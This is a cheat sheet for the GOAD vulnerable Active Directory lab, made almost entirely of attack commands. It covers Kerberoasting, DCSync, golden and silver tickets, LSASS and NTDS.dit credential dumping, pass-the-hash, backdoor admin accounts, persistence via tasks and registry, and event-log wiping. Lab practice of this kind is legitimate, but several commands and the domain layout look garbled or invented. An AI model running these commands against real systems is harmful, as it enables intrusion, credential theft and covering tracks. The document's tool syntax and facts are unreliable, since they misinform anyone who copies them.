Skip to content
1337skills 1337skills

GOAD (Game of Active Directory)

GOAD (Game of Active Directory) is a vulnerable-by-design Active Directory lab environment designed for offensive security training. It creates complex multi-domain forests with security misconfigurations, lateral movement paths, and privilege escalation opportunities.

Lab Architecture

GOAD creates a multi-domain environment with the following structure:

  • GOAD.LOCAL (root domain) - Windows Server 2019/2022 with multiple DCs
  • SEVENKINGDOMS.LOCAL (child domain) - Subdomain with trusts
  • ESSOS.LOCAL (external domain) - External forest with forest trust
  • NORTH.SEVENKINGDOMS.LOCAL (grandchild domain) - Additional complexity

Installation

Prerequisites

# System requirements
- Terraform or Vagrant (infrastructure provisioning)
- VirtualBox or Proxmox (hypervisor)
- 16GB+ RAM minimum
- 100GB+ disk space
- Git for repository cloning

Clone and Setup GOAD

# Clone GOAD repository
git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD

# Install Terraform
# Ubuntu/Debian
sudo apt-get install terraform

# macOS
brew install terraform

# Windows (or use Terraform downloads)
choco install terraform

# Install Vagrant (alternative to Terraform)
# Ubuntu
sudo apt-get install vagrant virtualbox

# macOS
brew install vagrant virtualbox

Create Lab with Terraform

# Navigate to terraform directory
cd GOAD/providers/terraform

# Initialize Terraform
terraform init

# Plan deployment
terraform plan

# Deploy infrastructure
terraform apply -auto-approve

# Check deployment status
terraform show

# Destroy lab when done
terraform destroy -auto-approve

Create Lab with Vagrant

# Navigate to vagrant directory
cd GOAD/providers/vagrant

# List available machines
vagrant status

# Start all VMs
vagrant up

# Start specific VM
vagrant up DC01 DC02 SRV02 etc01

# Stop VMs
vagrant halt

# Destroy environment
vagrant destroy -f

Domain Enumeration

Initial Reconnaissance

# Get domain information
ldapsearch -x -H ldap://192.168.56.10 -b "dc=goad,dc=local" '(objectClass=domain)'

# List all users
ldapsearch -x -H ldap://192.168.56.10 -b "dc=goad,dc=local" "(objectClass=user)" sAMAccountName

# List all groups
ldapsearch -x -H ldap://192.168.56.10 -b "dc=goad,dc=local" "(objectClass=group)" distinguishedName

# List all computers
ldapsearch -x -H ldap://192.168.56.10 -b "dc=goad,dc=local" "(objectClass=computer)" dNSHostName

# Enumerate domain trusts
nltest /domain_trusts /all_trusts

# Get domain SID
lsadump::dcsync /domain:goad.local /all /csv

User Enumeration

# Using PowerView (PowerShell)
Get-DomainUser | Select-Object samAccountName, userAccountControl

# Find users with pre-auth disabled
Get-DomainUser -UACFilter DONT_REQUIRE_PREAUTH

# Find service accounts (SPNs)
Get-DomainUser -SPN | Select-Object samAccountName, servicePrincipalName

# Find admin users
Get-DomainGroupMember -GroupName "Domain Admins" -Recurse | Select-Object MemberName

# Find kerberoastable accounts
Get-DomainUser -SPN | Select-Object samAccountName, servicePrincipalName

Attack Paths

Path 1: NORTH Domain Compromise

# Enum NORTH domain via domain trusts
Get-DomainComputer -Domain north.sevenkingdoms.local

# Find vulnerable service account
Get-DomainUser -Domain north.sevenkingdoms.local -SPN

# Kerberoast service account password
python3 GetUserSPNs.py -dc-ip 192.168.56.11 sevenkingdoms.local/DC01\$:password -request -output north_hashes.txt

# Crack hash
hashcat -m 13100 north_hashes.txt wordlist.txt

# Use credentials for lateral movement
psexec.exe -u NORTH\\svc_account -p password \\192.168.56.30 cmd.exe

Path 2: SEVENKINGDOMS Child Domain Compromise

# Dump credentials from GOAD.LOCAL
lsadump::dcsync /domain:goad.local /user:Administrator

# Create golden ticket
kerberos::golden /user:Administrator /domain:goad.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:hash /ticket:golden.kirbi

# Use golden ticket for child domain
kerberos::ptt golden.kirbi

# Access child domain resources
net use \\DC02.sevenkingdoms.local\c$

Path 3: Cross-Forest Trust Exploitation

# Get forest trusts
Get-DomainTrust -Forest

# List ESSOS forest users
Get-DomainUser -Domain essos.local

# Create inter-realm ticket for forest trust
kerberos::tgt /user:Administrator@GOAD.LOCAL /domain:GOAD.LOCAL /krbtgt:hash

# Request service ticket across trust
kerberos::s4u /user:Administrator@GOAD.LOCAL /domain:ESSOS.LOCAL /impersonate:Administrator /ticket:tgt.kirbi /service:cifs/filserver.essos.local

Path 4: Constrained Delegation Abuse

# Find accounts with delegation rights
Get-DomainUser -AllowDelegation | Select-Object samAccountName, userAccountControl

# Extract service account creds via Kerberoast
python3 GetUserSPNs.py -dc-ip 192.168.56.10 goad.local/user:password -request

# Use delegation to impersonate admin
Rubeus.exe s4u /user:service_account /password:cracked_password /impersonate:Administrator /domain:goad.local /dc:192.168.56.10

Lateral Movement Techniques

Pass-the-Hash (PTH)

# Extract NTLM hash from DC
lsadump::dcsync /domain:goad.local /user:Administrator

# Create process with hash (PTH)
pth-winexe -U GOAD/Administrator%hash //target.local cmd

# SMB pass-the-hash
psexec.py -hashes :hash DOMAIN/user@target.local

# PTH to access network shares
net use \\target\c$ /U:DOMAIN\user password

Kerberos Attacks

# Create silver ticket for service
kerberos::silver /user:Administrator /domain:goad.local /sid:S-1-5-21-xxx /target:fileserver.local /service:cifs /hash:service_hash

# Inject ticket and access share
kerberos::ptt silver.kirbi
net use \\fileserver.local\share

# AS-REP roasting
GetNPUsers.py -dc-ip 192.168.56.10 goad.local/ -format hashcat -output asrep.txt
hashcat -m 18200 asrep.txt wordlist.txt

# Kerberoasting
GetUserSPNs.py -dc-ip 192.168.56.10 goad.local/user:password -request -output tgs.txt
hashcat -m 13100 tgs.txt wordlist.txt

WMI Lateral Movement

# Execute command via WMI
wmic /node:target /user:DOMAIN\user /password:password process call create "cmd.exe /c powershell IEX..."

# Create WMI event subscription for persistence
wmic /node:target /user:domain\admin /password:pass create session
wmic /node:target event filter create name="malware" eventnamespace="\\\\.\\root\\cimv2" querylanguage=WQL query="SELECT * FROM __InstanceModificationEvent WITHIN 60"

RDP Lateral Movement

# RDP with extracted credentials
xfreerdp /u:DOMAIN\\user /p:password /v:target.local

# Restricted Admin Mode (hash only, no password needed)
xfreerdp /u:DOMAIN\\user /pth:ntlmhash /v:target.local

# Enable RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# RDP via GUI
mstsc.exe /u:DOMAIN\\user /v:target.local

Privilege Escalation

UAC Bypass Techniques

# Token impersonation
meterpreter > steal_token <pid>
meterpreter > execute -f cmd.exe -i

# PPID spoofing
beacon > spawnto x64 explorer.exe
beacon > execute-assembly Rubeus.exe asktgt /user:admin /password:pass

# Scheduled task privilege escalation
schtasks /create /tn privesc /tr "C:\payload.exe" /sc onstart /ru System

# Service binary hijacking
takeown /f C:\path\to\service.exe
icacls C:\path\to\service.exe /grant Everyone:F
# Replace service.exe and restart
net stop servicename
net start servicename

Privilege Escalation via Misconfigurations

# Find services running as SYSTEM with weak permissions
Get-Service | ForEach-Object { icacls "C:\path\to\service.exe" }

# Weak service permissions
Get-WmiObject win32_service | Where-Object {$_.PathName -match "C:\\Users"}

# Unquoted service paths
reg query "HKLM\SYSTEM\CurrentControlSet\Services" /s /v ImagePath | grep -v "\""

# Run binary in middle of path
C:\Program.exe  # If path is "C:\Program Files\...\service.exe" unquoted

Abuse of Credentials

# Extract cached credentials
secretsdump.py -just-dc-user-sam DOMAIN\\admin@192.168.56.10

# Pass-the-key (Kerberos)
python3 -m impacket.ticketer -nthash hash -identity admin DOMAIN.LOCAL

# Credential dumping from LSASS
lsadump::process /name:lsass
procdump.exe -ma lsass.exe lsass.dmp

Persistence and Cleanup

Persistence Mechanisms

# Create domain admin backdoor
net user backdoor Password123! /add /domain
net group "Domain Admins" backdoor /add /domain

# Registry persistence (HKCU Run)
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "C:\payload.exe"

# Scheduled task persistence
schtasks /create /tn "Windows Maintenance" /tr "C:\payload.exe" /sc onstart /ru System

# WMI event subscription persistence
wmic /namespace:"\\\\.\root\subscription" class __EventFilter create Name="malware", EventNamespace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60"

# Golden ticket for persistence
kerberos::golden /user:Administrator /domain:goad.local /sid:S-1-5-21-xxx /krbtgt:hash /ticket:golden.kirbi
kerberos::ptt golden.kirbi

# Silver ticket for specific service
kerberos::silver /user:Administrator /domain:goad.local /sid:S-1-5-21-xxx /target:dc01.goad.local /service:cifs /hash:service_hash /ticket:silver.kirbi

Cleanup and Anti-Forensics

# Clear Event Logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# Delete history
Remove-Item (Get-PSReadlineOption).HistorySavePath

# Clear DNS cache
ipconfig /flushdns

# Remove persistent scheduled tasks
schtasks /delete /tn "Windows Maintenance" /f

# Remove domain backdoor user
net user backdoor /delete /domain

# Remove registry persistence
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /f

# Dump SAM for offline analysis (before cleanup)
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM

Lab Troubleshooting

# Verify DC connectivity
ping dc01.goad.local
nslookup dc01.goad.local

# Check domain replication
repadmin /replsummary

# Verify domain trust relationships
nltest /domain_trusts

# List domain controllers
nltest /dclist:goad.local

# Reset domain trust
nltest /resetpwd

# Check network connectivity
Test-NetConnection dc01.goad.local -Port 389

Common Vulnerability Scenarios in GOAD

Scenario 1: Weak Service Account Passwords

# Identify service accounts
Get-DomainUser -SPN | Select-Object samAccountName, servicePrincipalName

# Kerberoast them
python3 GetUserSPNs.py -dc-ip 192.168.56.10 goad.local/user:password -request -output kerberoast.txt

# Crack with weak wordlist
hashcat -m 13100 kerberoast.txt rockyou.txt

# Lateral movement with cracked creds
psexec.py -no-pass goad.local/service_account@192.168.56.30

Scenario 2: Users without Pre-Authentication

# Find vulnerable users
python3 GetNPUsers.py -dc-ip 192.168.56.10 goad.local/ -usersfile users.txt -no-pass -format john

# Extract AS-REP hashes
python3 GetNPUsers.py -dc-ip 192.168.56.10 goad.local/ -format hashcat -output asrep.txt

# Crack offline
hashcat -m 18200 asrep.txt wordlist.txt

# Use cracked credentials
psexec.py goad.local/user:password@192.168.56.10

Scenario 3: Domain Trust Exploitation

# Identify domain trusts
Get-DomainTrust

# Extract parent domain credentials
lsadump::dcsync /domain:goad.local /all /csv

# Create inter-realm TGT
kerberos::tgt /user:Administrator@goad.local /domain:goad.local /krbtgt:hash

# Request ticket for child domain
kerberos::s4u /user:Administrator@goad.local /domain:sevenkingdoms.local /impersonate:Administrator /ticket:tgt.kirbi

# Access child domain resources
net use \\dc02.sevenkingdoms.local\c$

Scenario 4: Constrained Delegation

# Find accounts with delegation
Get-DomainUser -AllowDelegation

# Extract credentials via Kerberoast
python3 GetUserSPNs.py -dc-ip 192.168.56.10 goad.local/user:password -request

# Use s4u2proxy to impersonate admin
python3 impacket/examples/s4u.py -hashes :hash goad.local/svc_account@dc01.goad.local -spn cifs/fileserver.goad.local -impersonate Administrator

Credential Dumping from GOAD

NTDS.dit Extraction

# Copy NTDS.dit from DC (requires SYSTEM)
powershell -Command "Copy-Item C:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit"

# Copy SYSTEM registry hive
reg save HKLM\SYSTEM C:\Temp\SYSTEM

# Extract credentials offline
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -output domain_hashes

# Parse extracted hashes
cat domain_hashes.txt | cut -d: -f1,3 > users_hashes.txt

# Crack domain admin hash
hashcat -m 1000 domain_admin_hash rockyou.txt

LSASS Memory Dumping

# Dump LSASS process
procdump.exe -ma lsass.exe lsass.dmp

# Parse with pypykatz
pypykatz.py lsa minidump lsass.dmp

# Extract with secretsdump
secretsdump.py -lsass lsass.dmp -output lsass_creds

# Parse credential output
grep -i "Domain Admin" lsass_creds

DCSync Attacks

# DCSync all users from DC
lsadump::dcsync /domain:goad.local /all /csv

# DCSync specific user
lsadump::dcsync /domain:goad.local /user:krbtgt

# DCSync with Impacket
secretsdump.py -just-dc-user-sam goad.local/user:password@192.168.56.10

# Extract krbtgt for golden tickets
lsadump::dcsync /domain:goad.local /user:krbtgt /csv

GOAD Domain Structure

DomainForestTypePurpose
GOAD.LOCALGOADRoot DomainPrimary domain with vulnerabilities
SEVENKINGDOMS.LOCALGOADChild DomainChild domain of GOAD.LOCAL
NORTH.SEVENKINGDOMS.LOCALGOADGrandchild DomainDemonstrates domain hierarchy
ESSOS.LOCALESSOSExternal ForestSeparate forest with trust

Key Machines in GOAD

MachineDomainRoleIPOS
DC01GOAD.LOCALDomain Controller192.168.56.10Windows Server 2019
DC02SEVENKINGDOMS.LOCALChild DC192.168.56.11Windows Server 2019
DC03NORTH.SEVENKINGDOMS.LOCALGrandchild DC192.168.56.12Windows Server 2019
SRV02GOAD.LOCALMember Server192.168.56.20Windows Server 2019
SRV03SEVENKINGDOMS.LOCALMember Server192.168.56.30Windows Server 2019
ROOTDCESSOS.LOCALRoot DC (Forest)192.168.56.50Windows Server 2019

Attack Workflow Example

Initial Access to GOAD

# 1. Scan network
nmap -p 139,445,389,3268 192.168.56.0/24

# 2. Enumerate DC
enum4linux -a 192.168.56.10

# 3. User enumeration
GetADUsers.py 192.168.56.10

# 4. Check for pre-auth disabled
GetNPUsers.py -dc-ip 192.168.56.10 goad.local/ -format hashcat -output asrep.txt

# 5. Crack hashes (if successful)
hashcat -m 18200 asrep.txt rockyou.txt

# 6. Use cracked credentials for lateral movement
psexec.py goad.local/user:password@192.168.56.10

# 7. Escalate to domain admin
python3 GetUserSPNs.py -dc-ip 192.168.56.10 goad.local/user:password -request -output kerberoast.txt
hashcat -m 13100 kerberoast.txt rockyou.txt

# 8. Domain compromise
psexec.py -hashes :hash goad.local/administrator@192.168.56.10

# 9. Golden ticket for persistence
lsadump::dcsync /domain:goad.local /user:krbtgt
kerberos::golden /user:Administrator /domain:goad.local /sid:S-1-5-21-xxx /krbtgt:hash

Learning Objectives from GOAD

  • Multi-domain forest enumeration and exploitation
  • Domain trust exploitation and abuse
  • Service account targeting and Kerberoasting
  • Constrained and unconstrained delegation attacks
  • Golden ticket and silver ticket creation
  • Pass-the-hash and pass-the-ticket techniques
  • Cross-forest attack chains
  • Privilege escalation in complex environments
  • Credential dumping at scale
  • Lateral movement across domains

Best Practices for GOAD Practice

  • Start with unauthenticated enumeration
  • Practice each attack vector independently first
  • Document all credentials and hashes extracted
  • Test cleanup and anti-forensics techniques
  • Use different tools for same attack (impacket, Rubeus, mimikatz)
  • Practice OPSEC and avoid detection
  • Time attacks and measure impact
  • Restore lab between practice sessions
  • Review lab logs to understand detection opportunities

References